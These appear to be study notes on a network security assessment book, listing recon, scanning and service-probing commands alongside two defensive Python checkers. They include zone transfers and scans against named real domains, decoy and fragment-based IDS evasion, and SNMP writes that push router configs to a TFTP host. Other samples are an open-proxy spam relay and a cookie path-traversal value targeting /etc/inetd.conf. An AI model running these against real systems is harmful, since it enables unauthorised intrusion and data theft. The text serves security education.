CHAPTER 1 - Network Security Assessment

Internet Based Attackers
  Opportunistic attackers who scour large Internet address spaces for vulnerable systems
  Focused attackers who attack select Internet-based systems with a specific goal in mind

Defender's dilemma
  A defender must ensure the integrity of every point of entry, whereas an attacker only needs to gain access through one to be successful

A zero-day bug has a lifespan of 348 days before a vendor patch is made available

The Cyclic Assessment Approach

--------------------------------------------------------------------------------

CHAPTER 2 - Network Security Assessment Platform

Reconnaissance Tools
  BiDiBLAH - Windows

Network Scanning Tools
  Nmap
  Nessus
  Commercial tools - ISS Internet Scanner, eEye Scanner, QualysGuard and Matta Colossus (a lot of false positives)

Exploitation Frameworks
  Metasploit
  Commercial tools - CORE IMPACT and Immunity CANVAS
  3rd party - Argeniss and GLEG (zero-day exploit packs)

Web Application Testing Tools
  Proxy based - Paros, WebScarab and Burp
  Active - Wapiti and Nikto
  Commercial - WatchFire AppScan, SPI Dynamics WebInspect and Cenzic Hailstorm

--------------------------------------------------------------------------------

CHAPTER 3 - Internet Host and Network Enumeration

Open Source info
  Indirect
    Web and newsgroup search engines
    Domain and IP WHOIS registrars
    Border Gateway Protocol (BGP) looking glass sites and route servers
    Public DNS name servers
  Direct
    DNS querying and grinding against specific name servers
    Web server crawling
    SMTP probing

Querying Web and Newsgroup Search Engines
  Google search functionality - contact details, search queries (dorks), newsgroups, Netcraft

Domain WHOIS Registrars (TLD)
  Administrator details - whois

IP WHOIS Registrars (RIR)
  Regional Internet Registries (RIR)
    American Registry for Internet Numbers (ARIN)
    Réseaux IP Européens (RIPE)
    Asia Pacific Network Information Centre (APNIC)
    Latin American and Caribbean Network Information Centre (LACNIC)
    African Network Information Centre (AfriNIC)

IP WHOIS Querying Tools - whois
  Enumerate objects for a given target
    $ whois nintendo -h whois.arin.net          # Enum Nintendo objects in ARIN
  Harvest user details
    $ whois "@mitre.org" -h whois.arin.net      # Enum MITRE Corporation staff through ARIN
  Enum maintainer object
    $ whois cs-security-mnt                     # Enumerating the cs-security-mnt object from RIPE

BGP Querying
  FixedOrbit

DNS Querying - Reverse DNS sweep
  nslookup, host and dig - details on name servers (NS), domains and sub-domains, hostnames, mail exchangers (MX)

Forward DNS Querying - nslookup, dig
  NSLOOKUP                                      # Enum basic domain details
    $ nslookup
    > set querytype=any
    > cia.gov

DNS Zone Transfer Techniques - host, dig, nslookup
  HOST
    $ host -l ucia.gov                          # Enum authoritative name servers for zone transfer
  DIG
    $ dig @relay2.ucia.gov ucia.gov axfr        # DNS zone transfer - internal/external IPs
    $ dig @relay2.ucia.gov 129.81.198.in-addr.arpa axfr   # Enum PTR records

Forward DNS Grinding - Brute-force
  NSLOOKUP
    $ nslookup                                  # Forward DNS lookup to enumerate MX records
    > set querytype=mx
    > bankofengland.co.uk
  TXDNS - Windows tool
    C:\tools> txdns -f mail-dict.txt bankofengland.co.uk

Reverse DNS Sweeping
  GHBA
    $ ghba 198.81.129.0

Web Server Crawling - Crawl and mirror
  Tools - Wikto, HTTrack, BlackWidow, GNU Wget

Automating Enumeration - SpiderFoot and BiDiBLAH

SMTP Probing
  Sending mail to get more details

Enumeration Technique Recap
  Web and newsgroup searches
    Using Google to perform searches against established domain names and target networks to identify personnel, hostnames, domain names, and useful data residing on publicly accessible web servers.

  WHOIS querying
    Querying domain and IP registrars to retrieve network block, routing, and contact details related to the target networks and domain names. IP WHOIS querying gives useful information relating to the sizes of reserved network blocks (useful later when performing intrusive network scanning) and AS number details.

  BGP querying
    Cross-referencing AS numbers with BGP looking glass sites and route servers to enumerate the associated IP blocks under the AS, and then feeding these details back into other query paths (such as DNS or further WHOIS querying).

  DNS querying
    Querying publicly accessible DNS servers to enumerate hostnames and subdomains. Misconfigured DNS servers are also abused to download DNS zone files that categorically list subdomains, hostnames, operating platforms of devices, and internal network information in severe cases.

  Web server crawling
    Accessible web servers are crawled using automated spidering software to identify associated servers, domains, and useful information, such as web server software details, enumerated users, and email addresses.

  SMTP probing
    Sending email messages to nonexistent accounts at target domains to map internal network space by analyzing the responses from the SMTP system.
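The DNS querying recap above notes that a zone file obtained by AXFR can list internal hosts and platform details. The following added example (not from the book or these notes) parses a constructed zone dump in dig axfr output format and reports the records an assessor would pull out of it: A records in RFC 1918 space, role-revealing hostnames and HINFO platform leaks. It is the check a defender runs against their own zone before exposing it; the zone, addresses and ROLE_HINTS list are constructed.

```python
import ipaddress
import re

# Constructed sample in `dig ... axfr` output format (fictional zone, RFC 5737 /
# RFC 1918 addresses).
SAMPLE_ZONE = """\
example-corp.test.            3600 IN SOA   ns1.example-corp.test. hostmaster.example-corp.test. 2024010101 7200 3600 1209600 3600
example-corp.test.            3600 IN NS    ns1.example-corp.test.
example-corp.test.            3600 IN MX    10 mail.example-corp.test.
ns1.example-corp.test.        3600 IN A     198.51.100.10
www.example-corp.test.        3600 IN A     198.51.100.20
mail.example-corp.test.       3600 IN A     198.51.100.25
vpn-gw.example-corp.test.     3600 IN A     198.51.100.30
fw-inside.example-corp.test.  3600 IN A     10.0.0.1
dc01.example-corp.test.       3600 IN A     10.0.1.5
sqlprod.example-corp.test.    3600 IN A     10.0.2.40
printer-3f.example-corp.test. 3600 IN A     192.168.3.21
backup.example-corp.test.     3600 IN HINFO "Solaris 9" "SPARC"
intranet.example-corp.test.   3600 IN CNAME dc01.example-corp.test.
"""

RECORD_RE = re.compile(r"^(\S+)\s+\d+\s+IN\s+(\S+)\s+(.*)$")

# RFC 1918 plus loopback and link-local: addresses that should never appear in
# a zone served to the Internet.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Hostname fragments that advertise a host's role (constructed heuristic list).
ROLE_HINTS = ("dc", "sql", "fw", "vpn", "backup", "printer", "intranet")


def parse_zone(text):
    """Return (owner, rtype, rdata) tuples; skips blank lines and ; comments."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if m:
            records.append((m.group(1).rstrip("."), m.group(2), m.group(3).strip()))
    return records


def is_internal(addr):
    return any(addr in net for net in INTERNAL_NETS)


def audit_zone(text):
    """Read the zone the way an assessor would after a successful AXFR.

    internal_hosts : A records pointing into private address space
    role_hints     : owners whose first label gives away the host's function
    platform_leaks : HINFO records disclosing OS / hardware
    """
    findings = {"internal_hosts": [], "role_hints": [], "platform_leaks": []}
    for owner, rtype, rdata in parse_zone(text):
        label = owner.split(".")[0].lower()
        if rtype == "A" and is_internal(ipaddress.ip_address(rdata)):
            findings["internal_hosts"].append((owner, rdata))
        if rtype == "HINFO":
            findings["platform_leaks"].append((owner, rdata))
        if any(hint in label for hint in ROLE_HINTS):
            findings["role_hints"].append(owner)
    return findings


def internal_networks(findings):
    """Collapse leaked addresses to /24s: the internal ranges a later scan would
    be aimed at, and the records a defender should move to an internal view."""
    nets = {str(ipaddress.ip_network(addr + "/24", strict=False))
            for _, addr in findings["internal_hosts"]}
    return sorted(nets)


if __name__ == "__main__":
    result = audit_zone(SAMPLE_ZONE)
    for key, items in result.items():
        print(f"{key}:")
        for item in items:
            print(f"  {item}")
    print("internal /24s exposed:", internal_networks(result))
```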
--------------------------------------------------------------------------------

CHAPTER 4 - IP Network Scanning

ICMP Probing
  ICMP Types
    Type 8 - Ping (Echo request)
    Type 13 - Timestamp request
    Type 15 - Information request
    Type 17 - Subnet address mask request

  ICMP Tools
    SING
      $ sing -echo 192.168.0.255      # Type 8
      $ sing -tstamp 192.168.0.50     # Type 13
      $ sing -mask 192.168.0.25       # Type 17
    NMAP
    ICMPScan
      $ icmpscan -c -t 500 -r 1 192.168.1.0/24

OS Fingerprinting Using ICMP
  Xprobe2
    $ xprobe2 -v 192.168.0.174

TCP PORT SCANNING
  TYPES
    STANDARD METHOD
      Vanilla connect - full TCP 3-way handshake (nmap -sT)
      Half-open connect - 2-way handshake (SYN, SYN/ACK), then RST sent (nmap -sS or scanrand 10.0.1.1-254:quick)

    STEALTH METHOD
      Inverse TCP - send TCP probes such as FIN, XMAS (URG/PSH) or NULL. If open - no response; if closed - RST
        nmap -sF (FIN), -sX (XMAS) or -sN (NULL)
      ACK probe scan - 1K ACK sent, check the TTL or WINDOW of the response (nmap -sA TTL, -sW Window, or hping2)

    3rd Party and Spoofed Scans
      FTP bounce - port scan through a vulnerable FTP server (nmap -P0 -b)
        Connect to FTP - PASV, PORT 144, LIST - if the response is 226 the port is open, if 425 it is closed
      Proxy bounce - use a proxy to perform a bounce port scan
      Sniffer-based spoofed scan - same as half-open, but probes are sent from a spoofed IP on the network and the responses are sniffed, to see what access that spoofed IP is granted
      IP ID header scan - use an idle (zombie) host to scan the target; hping2 or nmap -sI, Vscan

  PAGE 85 PORT LIST

UDP PORT SCANNING
  A port is reported closed only if an ICMP destination port unreachable message comes back
  Tools - Nmap (-sU), scanudp

IDS Evasion and Filter Circumvention
  IDS bypass
    Fragmented probe packets
      Tools
        Fragtest - 8-byte fragments, frag-new, frag-old
          $ fragtest frag frag-new frag-old www.bbc.co.uk
        Fragroute - modify fragroute.conf and send an ICMP request
          $ fragroute 192.168.102.251
        NMAP
          $ nmap -sS -f 192.168.102.251

    Spoof multiple hosts (decoys)
      $ nmap -sS -P0 -D 62.232.12.8,ME,65.213.217.241 192.168.102.251    # decoy addresses

  Packet filter bypass
    Source routing - specify which gateways and routes your packets should take; limit of 40 bytes for route data
      TYPES
        Strict Source and Route Record (SSRR) - any number of intermediate gateways
        Loose Source and Route Record (LSRR) - next address has to be on a directly connected network
      Vulnerabilities can be exploited by
        Reversing the source route
        Circumventing filters and gaining access to internal hosts
      CVE-1999-0909 Windows NT - offset > hops and the last hop is an internal host
      CVE-2006-2379 Windows 2003 and earlier gives RCE; Windows 2003 and XP are secured by default.
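Both circumvention techniques above leave a signature in the IPv4 header: the 8-byte fragments produced by nmap -f and fragtest split the TCP header across datagrams, and a source-routed packet must carry an LSRR or SSRR option. The following added example (not from the book or these notes) parses raw IPv4 headers and flags both conditions, which is the check a border filter or IDS applies to drop or log such packets. The sample datagrams are constructed in-process with RFC 5737 addresses; build_ipv4 exists only to assemble them and sends nothing.

```python
import struct
import ipaddress

IPOPT_EOL, IPOPT_NOP = 0, 1
IPOPT_LSRR, IPOPT_SSRR = 131, 137   # Loose / Strict Source and Record Route
PROTO_TCP = 6
TCP_HDR_MIN = 20                    # bytes needed to see ports and flags


def parse_ipv4(pkt):
    """Decode the fixed IPv4 header plus the options bytes."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, _tlen, ident, flags_frag, ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(pkt) < ihl:
        raise ValueError("bad version/IHL")
    return {"id": ident, "ttl": ttl, "proto": proto,
            "mf": bool(flags_frag & 0x2000),          # More Fragments flag
            "frag_off": (flags_frag & 0x1FFF) * 8,    # offset in bytes
            "src": str(ipaddress.IPv4Address(src)), "dst": str(ipaddress.IPv4Address(dst)),
            "options": pkt[20:ihl], "payload_len": len(pkt) - ihl}


def source_route_option(options):
    """Walk the RFC 791 option TLVs; return (type, [hops]) for LSRR/SSRR, else None."""
    i = 0
    while i < len(options):
        kind = options[i]
        if kind == IPOPT_EOL:
            break
        if kind == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= len(options):
            break                                   # type byte without a length
        length = options[i + 1]
        if length < 2 or i + length > len(options):
            break                                   # length runs past the header
        if kind in (IPOPT_LSRR, IPOPT_SSRR):
            data = options[i + 3:i + length]        # skip type, length, pointer
            hops = [str(ipaddress.IPv4Address(data[j:j + 4])) for j in range(0, len(data) - 3, 4)]
            return kind, hops
        i += length
    return None


def classify(pkt):
    """Reasons a border filter or IDS would drop or log this datagram."""
    hdr = parse_ipv4(pkt)
    reasons = []
    sr = source_route_option(hdr["options"])
    if sr:
        reasons.append(f"source-routed ({'LSRR' if sr[0] == IPOPT_LSRR else 'SSRR'}) via {sr[1]}")
    tcp = hdr["proto"] == PROTO_TCP
    # First fragment too short to carry the TCP ports/flags: a filter that only
    # inspects the first fragment has nothing to match (RFC 1858 "tiny fragment").
    if tcp and hdr["frag_off"] == 0 and hdr["mf"] and hdr["payload_len"] < TCP_HDR_MIN:
        reasons.append(f"tiny first fragment ({hdr['payload_len']} bytes of TCP header)")
    # Later fragment landing inside the TCP header region; offset 8 is exactly
    # what the 8-byte fragments of `nmap -f` and fragtest produce.
    if tcp and 0 < hdr["frag_off"] < TCP_HDR_MIN:
        reasons.append(f"fragment offset {hdr['frag_off']} inside TCP header")
    return reasons


def build_ipv4(src, dst, proto, payload, mf=False, frag_off=0, options=b""):
    """Constructed helper: assemble a datagram for the samples (checksum left 0)."""
    options += b"\x00" * (-len(options) % 4)        # pad options to 32-bit words
    ihl = (20 + len(options)) // 4
    flags_frag = (0x2000 if mf else 0) | (frag_off // 8)
    fixed = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl, 0, 20 + len(options) + len(payload),
                        0x1234, flags_frag, 64, proto, 0,
                        ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return fixed + options + payload


# Constructed samples using RFC 5737 documentation addresses.
TCP_SYN = struct.pack("!HHIIBBHHH", 40000, 139, 1, 0, 5 << 4, 0x02, 8192, 0, 0)  # 20-byte SYN
NORMAL = build_ipv4("192.0.2.10", "198.51.100.5", PROTO_TCP, TCP_SYN)
FRAG1 = build_ipv4("192.0.2.10", "198.51.100.5", PROTO_TCP, TCP_SYN[:8], mf=True)
FRAG2 = build_ipv4("192.0.2.10", "198.51.100.5", PROTO_TCP, TCP_SYN[8:], frag_off=8)
# LSRR option: type 131, length 3 + 4 * hops, pointer 4, then the hop list.
LSRR_OPT = bytes([IPOPT_LSRR, 11, 4]) + ipaddress.IPv4Address("198.51.100.1").packed \
    + ipaddress.IPv4Address("10.0.0.9").packed
ROUTED = build_ipv4("192.0.2.10", "198.51.100.5", PROTO_TCP, TCP_SYN, options=LSRR_OPT)

if __name__ == "__main__":
    for label, pkt in (("normal", NORMAL), ("frag1", FRAG1), ("frag2", FRAG2), ("routed", ROUTED)):
        print(f"{label:7s} -> {classify(pkt) or ['pass']}")
```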
204 | Tools 205 | LSRScan - b -> insert IP before host, a -> Insert IP after the host 206 | $ lsrscan 217.53.62.0/24 207 | LSRTunnel - i proxy -t target -f spoofed ip 208 | $ lsrtunnel -i 192.168.102.2 -t 217.53.62.2 -f 198.81.129.194 209 | 210 | Specific TCP or UDP source port - 53(TCP/UDP),20,80,88(TCP/UDP)(Kerberos) 211 | Nmap -g 212 | Useful Ports - UDP 500 (ISAKMP) 213 | Low-Level IP Assessment 214 | Can be done by: 215 | Analysing TCP Timestamp - Uptime of hosts 216 | Analysing Response to TCP and ICMP Probes - Permitted TCP service 217 | Running Predictability Tests - TCP seq and IP ID increment 218 | IP Fingerprinting - Host's OS 219 | 220 | Analysing Response of TCP Probe 221 | 1. TCP SYN/ACK - Open 222 | 2. TCP RST/ACK - Rejected by host or firewall(sec) 223 | 3. ICMP Type 3 Code 13 - Prohibited connection 224 | 4. Nothing - Intermediary Security device silently dropped it 225 | Tools 226 | Hping2 227 | $ hping2 -c 3 -s 53 -p 139 -S 192.168.0.1 (c: Packets ; s: Source Port; d: Destination Port; S: SYN Flag; F: FIN Flag; A: ACK Flag) 228 | Firewalk 229 | States: ICMP Type 11 Code 0(Received; Passed through the filter and response will appear) 230 | Dropped (Probably done at the gateway) 231 | ICMP Type 3 Code 13 (Received; Simple filter{Router ACL} is being used) 232 | 233 | $ firewalk -n -S21,22,23,25,53,80 -pTCP gw.test.org www.test.org 234 | -S(Ports selected) -pTCP(gateway target) 235 | 236 | Passively Monitoring ICMP Responses 237 | 1. ICMP TTL Exceeded(T11 C0) - Indicate a Routing Loop 238 | 2. 
ICMP Administratively Prohibited (T3 C13) - Firewall/Router rejects packet 239 | 240 | IP Fingerprinting 241 | Nmap - $ nmap -O -sS 192.168.0.65 242 | 243 | TCP Sequence and IP ID Incrementation 244 | Nmap - $ nmap -v -sS -O 192.168.102.251 245 | 246 | Network Scanning Recap 247 | ICMP scanning and probing 248 | By launching an ICMP ping sweep, you can effectively identify poorly protected hosts (as security-conscious administrators filter inbound ICMP messages) and perform a degree of operating system fingerprinting and reconnaissance by analyzing responses to the ICMP probes. 249 | 250 | Half-open SYN flag TCP port scanning 251 | A SYN port scan is often the most effective type of port scan to launch directly against a target IP network space. SYN scanning is extremely fast, allowing you to scan large networks quickly. 252 | 253 | Inverse TCP port scanning Inverse scanning types (particularly FIN, XMAS, and NULL) take advantage of idiosyncrasies in certain TCP/IP stack implementations. This scanning type isn’t effective when scanning large network spaces, although it is useful when testing and investigating the security of specific hosts and small network segments. 254 | 255 | Third-party TCP port scanning 256 | Using a combination of vulnerable network components and TCP spoofing, third-party TCP port scans can be effectively launched. Scanning in this fashion has two benefits: hiding the true source of a TCP scan and assessing the filters and levels of trust between hosts. Although time-consuming to undertake, third party scanning is extremely useful when applied correctly. 257 | 258 | UDP port scanning Identifying accessible 259 | UDP services can be undertaken easily only if ICMP type 3 code 3 (“Destination port unreachable”) messages are allowed back through filtering mechanisms that protect target systems. UDP services can sometimes be used to gather useful data or directly compromise hosts (the DNS, SNMP, TFTP, and BOOTP services in particular). 
260 | 261 | IDS evasion and filter circumvention 262 | Intrusion detection systems and other security mechanisms can be rendered ineffective by using multiple spoofed decoy hosts when scanning or by fragmenting probe packets using Nmap or fragroute. Filters such as firewalls, routers, and even software (including the Microsoft IPsec filter) can sometimes be bypassed using specific source TCP or UDP ports, source routing, or stateful attacks. 263 | 264 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 265 | 266 | CHAPTER 5 - Assessing Remote Information Services5 267 | 268 | PAGE 104 - Remote Information Services 269 | 270 | DNS 271 | UDP 53 - Standard Direct Requests (Resolve Names to IP and vice versa) 272 | TCP 53 - Serve Information during zone transfers and other queries 273 | 274 | Retrieving DNS Service Version Information 275 | $ dig @nserver.apple.com version.bind chaos txt # DiG to glen BIND Version Info 276 | $ nslookup # NSLOOKUP to get BIND Version Info 277 | > server nserver.apple.com 278 | > set class=chaos 279 | > set type=txt 280 | > version.bind 281 | 282 | BIND Vulnerabilities 283 | PAGE 106 284 | CVE-2002-2211 and CVE-2006-0527(HP-UX and Tru64 servers) were DNS BIND Vuln affected by Cache Corruption 285 | 286 | Microsoft DNS Service Vulnerabilities 287 | Remote vulnerabilities in Microsoft DNS and WINS services 288 | PAGE 107 289 | 290 | DNS Zone Transfers 291 | $ dig @relay2.ucia.gov ucia.gov axfr # DiG to perform DNS Zone Transfer 292 | 293 | Reverse DNS Querying 294 | Check Point Firewall-1 -> Allows any to any rule 295 | $ nslookup # Extract Internal Host info through DNS 296 | > set querytype=any 297 | > server 144.51.5.2 298 | Using GHBA 299 | $ cat /etc/resolv.conf # Automate Reverse Lookup using GHBA 300 | nameserver 144.51.5.2 301 | $ ghba 192.168.1.0 302 | 303 | Forward DNS Grinding 304 | C:\tools> txdns -f smalllist.txt -s 
17.254.0.50 apple.com # Forward DNS Grinding using TXDNS.exe 305 | 306 | Finger (TCP-79 Cisco IOS Routers and Solaris) 307 | $ telnet 192.168.0.1 79 # Cisco 308 | $ finger @192.168.0.10 # Solaris 309 | 310 | Finger Information Leaks 311 | $ finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10 #User Details through solaris fingerd 312 | $ finger user@192.168.189.12 # User details through standard Finger 313 | 314 | Finder Redirection 315 | $ finger @192.168.0.10@217.34.17.20 # Bounce attack to find internal IP details 316 | 317 | Finger Process Manipulation Vulnerabilities 318 | Few Cfingerd are vulnerable to BOF Attacks 319 | 320 | Auth (ident TCP-113) 321 | IRC Server uses ident request 322 | $ nmap -I -sT 192.168.0.10 # Nmap 323 | 324 | Auth Process Manipulation Vulnerabilities 325 | Linux jidentd and cidentd are vulnerable to BOF 326 | 327 | NTP (UDP - 123) 328 | Obtain remote hostname, NTP daemon Version, OS details including processors 329 | 330 | NTP Fingerprinting 331 | $ perl ntp.pl -t 192.168.66.202 # OS fingerprinting using ntp.pl 332 | $ perl ntp.pl -t pingo # Enum Linux Sys details using ntp.pl 333 | 334 | NTP Vulnerabilities 335 | CVE-2001-0414 - BOF NTP daemon <=4.0.99K 336 | GLEG VulnDisco - 0 Day NTP 4.2.0 337 | 338 | SNMP (UDP - 161) 339 | Management Information Base (MIB) - Contains list of Object Identifiers(OID) such as Routing table entries, network stats and network interface 340 | 341 | Tools 342 | ADMsnmp 343 | $ ADMsnmp 192.168.0.1 # Bruteforce SNMP Community Strings 344 | Snmpwalk 345 | $ snmpwalk -c private 192.168.0.1 # Access MIB 346 | 347 | Compromising Devices by Reading from SNMP 348 | PAGE 118 - OID Table 349 | $ snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25 # Enum Win 2000 user accounts 350 | 351 | Compromising Devices by Writing to SNMP 352 | $ snmpset -r 3 -t 3 192.168.0.1 private .1.3.6.1.4.1.9.2.1.55.192.168.0.50 s "cisco-config" # Cisco 353 | $ snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.4.0 s "ascend-config 
# Ascend 354 | 355 | SNMP Process Manipulation Vulnerabilities 356 | PAGE 120 357 | 358 | LDAP (389) 359 | $ ldapsearch -h 192.168.0.65 # If Anonymous Access is allowed 360 | $ bf_ldap # Bruteforce LDAP 361 | 362 | Active Directory Global Catalog (TCP -3268) 363 | Stores logical representation of all users, servers and devices 364 | 365 | LDAP Process Manipulation Vulnerabilities 366 | PAGE -122 367 | 368 | Rwho (UDP -513) 369 | $ rwho 192.168.189.120 370 | 371 | RPC rusers 372 | $ rpcinfo -p 192.168.0.50 373 | $ rusers -l 192.168.0.50 # Activer user details 374 | 375 | READ LAST PAGES - 124 and 125 Remote Information Services Countermeasures 376 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 377 | ================================================================================================== 378 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 379 | 380 | CHAPTER 6 - Assessing Web Servers 381 | 382 | Fingerprinting 383 | Manual 384 | Using HTTP HEAD 385 | $ telnet www.trustmatta.com 80 386 | HEAD / HTTP/1.0 387 | Using HTTP OPTIONS 388 | $ telnet www.trustmatta.com 80 389 | OPTIONS / HTTP/1.0 390 | PAGE 130 - HTTP OPTION Response 391 | Querying through an SSL Tunnel - SSL Tunnel to local port 80 392 | $ telnet 127.0.0.1 80 393 | HEAD / HTTP/1.0 394 | Automated 395 | Httprint 396 | 397 | Identifying and Assessing Reverse Proxy Mechanisms 398 | HTTP Methods with Specific Host (MANUAL) 399 | $ telnet www.example.org 80 400 | HEAD / HTTP/1.1 401 | Host: www.example.org 402 | $ telnet www.example.org 80 # If it supports HTTP CONNECT, GET or POST,we can connect using next one 403 | OPTIONS / HTTP/1.1 404 | Host: www.example.org 405 | 406 | HTTP CONNECT 407 | $ telnet www.example.org 80 # Proxy a connection to port 25 of maila.microsoft.com 
408 | CONNECT maila.microsoft.com:25 HTTP/1.0 409 | HTTP POST 410 | $ telnet www.example.org 80 # POST Bounce 411 | POST http://maila.microsoft.com:25/ HTTP/1.0 412 | Content-Type: text/plain 413 | Content-Length: 0 414 | HTTP GET 415 | $ telnet cacheflow.example.org 80 #GET BOUNCE 416 | GET / HTTP/1.1 417 | HOST: mx4.sun.com:25 418 | HELO . 419 | MAIL FROM: spammer@alter.net 420 | RCPT TO: target@unsuspecting.com 421 | DATA 422 | Subject: Look Ma! I'm an open relay 423 | Hi, you've been spammed through an open proxy, because of a bug in The CacheOS 4 platform code. Have a great day! -Spammer 424 | . 425 | Automated HTTP Proxy Testing 426 | $ pxytest 192.108.105.34 427 | 428 | Enumerating Virtual Hosts and Web Sites 429 | Identifying Virtual Hosts 430 | Passive - Netcraft and DNS Querying 431 | Active - Web server crawling, SSL Cert Analysis and Analysis of server response 432 | Tool - Wikto 433 | Identifying Subsystems and Enabled Components 434 | Generic subsystems include: 435 | • HTTP 1.0 methods (GET, POST and HEAD) 436 | • HTTP 1.1 methods (GET, POST, HEAD, OPTIONS, PUT, DELETE, TRACE and CONNECT) 437 | • Web Distributed Authoring and Versioning (WebDAV) (PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK) 438 | • PHP 439 | • Basic authentication mechanisms 440 | Microsoft-specific subsystems include: 441 | • IIS sample and administrative scripts (IIS 3.0 and 4.0 - aexp3.htr Password Management script) 442 | • ASP and ASP.NET (Active Server Pages) (IIS 5.0 and 6.0) (aspnet_client/system_web) (DNASCAN) 443 | • ISAPI extensions (.printer, .ida, .htr) (PAGE 148) (WEBDAV and SEARCH) 444 | • Proprietary WebDAV extensions (MICROSOFT 200 SERVER IIS 5.0 and 6.0 - BCOPY, BDELETE, BMOVE, BPROPFIND, BPROPPATCH, NOTIFY, POLL, SUBSCRIBE, UNSUBSCRIBE) (MICROSOFT EXCHANGE 2003 SERVER - X-M-ENUMATTS) 445 | • Microsoft FrontPage (dll, exe and pwd) 446 | • Windows Media Services (CVE-2003-0349 - DLL file gives remote overflow to code execution) 447 | • Outlook Web Access 
(OWA) (/owa, /exchange, and /mail) 448 | • RPC over HTTP support (RPC over HTTP to communicate through an RPC proxy - RPC_CONNECT) 449 | • Enhanced authentication mechanisms (NTLM and Negotiate) 450 | $ telnet 83.142.224.21 80 T 451 | GET / HTTP/1.1 452 | Host: iis-server 453 | Authorization: Negotiate TlRMTVNTUAABAAAAB4IAoAAAAAAAAAAAAAAAAAAAAAA 454 | Apache-specific subsystems include: 455 | • OpenSSL 456 | • Apache modules (including mod_perl, mod_ssl, mod_security, mod_proxy, and mod_rewrite) 457 | Automatic - Nikto 458 | 459 | Investigating Known Vulnerabilities 460 | Generic Subsystem Vulnerabilities 461 | HTTP 1.1 Methods (CONNECT, TRACE, PUT AND DELETE) 462 | TRACE - XST (Cross site Tracing) allows Domain restriction Bypass, HTTP request-enabling 463 | 464 | WebDAV - (CVE-2002-0422 Microsoft IIS 5.0 and 5.1 Information disclosure, including internal IP address, through PROPFIND, WRITE, and MKCOL) (CVE-2000-0869 Apache 1.3.12 PROPFIND directory listing) 465 | 466 | PHP - PAGE 162 467 | 468 | Microsoft Web Server and subsystem Vulnerabilities 469 | IIS 5.0 - PAGE 164 470 | IIS 5.0 local privilege escalation exploit (CVE-2002-0869) 471 | IIS 6.0 - CVE-2007-2897 IIS 6.0 Denial of Service information leak and potential overflow and CVE-2005-2089 IIS 5.0 and 6.0 HTTP request smuggling 472 | ASP and ASP.NET - PAGE 166 - CVE-2006-0026 Priv Escla (ASP under IIS 6.0) 473 | ISAPI Extension - PAGE 167 474 | Microsoft proprietary WebDAV extensions - PAGE 167 475 | Microsoft FrontPage - Prompt with auth at author.dll (Poor Page have .pwd readble) (PAGE 169) CVE-2003-0822 (fp30reg.dll overflow) 476 | Outlook Web Access - PAGE 170 477 | 478 | Apache Web Server and Subsystem Vulnerabilities 479 | Apache HTTP Server - PAGE 171 - CVE-2002-0392 (Apache 1.3.24 chunked encoding exploit) 480 | Apache HTTP Server modules - PAGE 174 - CVE-2007-0774 (mod_jk 1.2.20 stack overflow) 481 | Apache Tomcat - PAGE 176 - CVE-2002-1394 and CVE-2002-1148 Tomcat (4.0.5) JSP source code 
disclosure 482 | OPENSSL- CVE-2003-0545 (OpenSSL0.9.7d double-free bug) and CVE-2002-0656 (OpenSSL 0.9.7-b2 and 0.9.6d client master key overflow) 483 | 484 | Basic Web Server Crawling 485 | Tools - Nikto, Wikto and N-Stalker 486 | Brute-force HTTP Authentication - Hydra and Brutus 487 | 488 | Web Servers Countermeasures - PAGE 183 489 | 490 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 491 | 492 | CHAPTER 7 - Assessing Web Applications 493 | 494 | 3 Layers - Presentation Tier, Application Tier and Data Tier 495 | 496 | Web Application Profiling 497 | HTML source review (Comments, Hidden fields that are passed to scripts and Client-side scripts) 498 | Manual - 499 | $ wget -r -m -nv http://www.example.org/ # Mirror a website 500 | $ tree # Review the mirrored files then grep for HTML Elements 501 | Automatic - Sam Spade 502 | 503 | Analysis of Server-side file extensions - ASP, ASPX, PHP, etc 504 | Session ID Fingerprinting - 505 | JSESSIONID - 506 | Apache Tomcat 4.x or later (32 Upper Alphanumeric chars) 507 | Apache Tomcat 3.x or earlier (10 Lower alphanumeric chars, end with Number) 508 | Caucho Resin 3.0.21 and later (21 ASCII chars - start with abc) 509 | Caucho Resin 3.0.20 and earlier (12 ASCII chars) 510 | IBM WebSphere (23 ASCII and :) 511 | Sun Java System Application Server (28 Lower alphanumeric) 512 | 513 | Active Backend Database Technology Assessment - SQLi 514 | 515 | Web Application Attack Strategies 516 | • Server-side script variables - Change scripts in URL or form fields (Paros) 517 | • HTTP request headers - PAGE 197, Using Referer Header 518 | • HTTP cookie fields - Cookie: USER=1826cc8f:PSTYLE=../../../../../../../etc/inetd.conf 519 | • XML request content 520 | WSDL (Web Services Description Language) Enumeration 521 | Attacking via XML 522 | 523 | 524 | Filter Evasion Techniques 525 | • SSL transport to bypass web 
